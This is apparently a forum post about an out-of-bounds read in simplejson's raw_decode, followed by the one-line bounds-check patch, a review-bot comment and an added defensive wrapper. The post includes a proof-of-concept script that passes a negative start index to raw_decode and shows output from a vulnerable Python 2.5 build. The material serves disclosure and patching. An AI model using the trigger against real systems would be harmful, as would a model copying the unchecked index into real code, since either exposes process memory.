Is there a python maintainer in the CSSU team? https://hackerone.com/reports/12297 - a security issue found in python (2.7 and newer for sure; I'm not sure if 2.5 is also vulnerable - I couldn't run the sample code to test the issue and I'm not sure which additional python package I should install to run it)
user:~# cat vulnerability_test.py
from simplejson import JSONDecoder

j = JSONDecoder()
a = '128931233'
b = "472389423"
# pick x as the string with the lower object address so diff is negative
if id(a) < id(b):
    x = a
    y = b
else:
    x = b
    y = a
diff = id(x) - id(y)
try:
    # a negative start index should be rejected; an unpatched decoder reads out of bounds instead
    j.raw_decode(y, diff)
    print("Vulnerable")
except:
    print("Not vulnerable")
user:~# python
Python 2.5.4 (r254:67916, May 17 2010, 21:00:32)
[GCC 4.2.1] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> execfile("vulnerability_test.py")
Vulnerable
>>>
- if (idx >= length) { + if ( idx < 0 || idx >= length) {
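Review bot: the added `idx < 0` guard closes exactly the case the test script above constructs (it passes `id(x) - id(y)`, a negative number, as the start index to `raw_decode`), but the hunk only shows the bounds check itself; confirm that the negative-index branch raises an exception the same way the existing `idx >= length` branch does, since the test script reports "Not vulnerable" only when `raw_decode` raises, and a branch that silently returns would still make the script print "Vulnerable".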
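For an interpreter that cannot be patched right away, the same bounds check can be applied at the Python call site before the index reaches the C scanner. This is an added example, not code from the report or the thread; it uses the standard-library `json` module (assumed to expose the same `raw_decode(s, idx)` interface as the `simplejson` decoder used in the test script) and reproduces the negative offset the test script derives from `id()` values.

```python
import json


def poc_index(a, b):
    """Reproduce the start index the test script passes to raw_decode.

    The script orders the two strings by object address and computes
    id(lower) - id(higher), which is always negative. Returns the string
    the script would decode together with that offset.
    """
    x, y = (a, b) if id(a) < id(b) else (b, a)
    return y, id(x) - id(y)


def bounded_raw_decode(s, idx=0):
    """raw_decode with the bounds check from the patch applied in Python.

    Mirrors the C-side guard ``idx < 0 || idx >= length``: any index that
    would start the scanner outside the buffer is rejected here, so an
    unpatched scanner never sees it.  Returns (value, end) like raw_decode.
    """
    if not isinstance(idx, int):
        raise TypeError("idx must be an int, got %r" % type(idx).__name__)
    if idx < 0 or idx >= len(s):
        raise ValueError("idx %d out of range for input of length %d"
                         % (idx, len(s)))
    return json.JSONDecoder().raw_decode(s, idx)


def is_rejected(s, idx):
    """True when bounded_raw_decode refuses the index (the safe outcome)."""
    try:
        bounded_raw_decode(s, idx)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # constructed inputs, same literals as the test script
    target, offset = poc_index('128931233', "472389423")
    print("offset %d rejected: %s" % (offset, is_rejected(target, offset)))
```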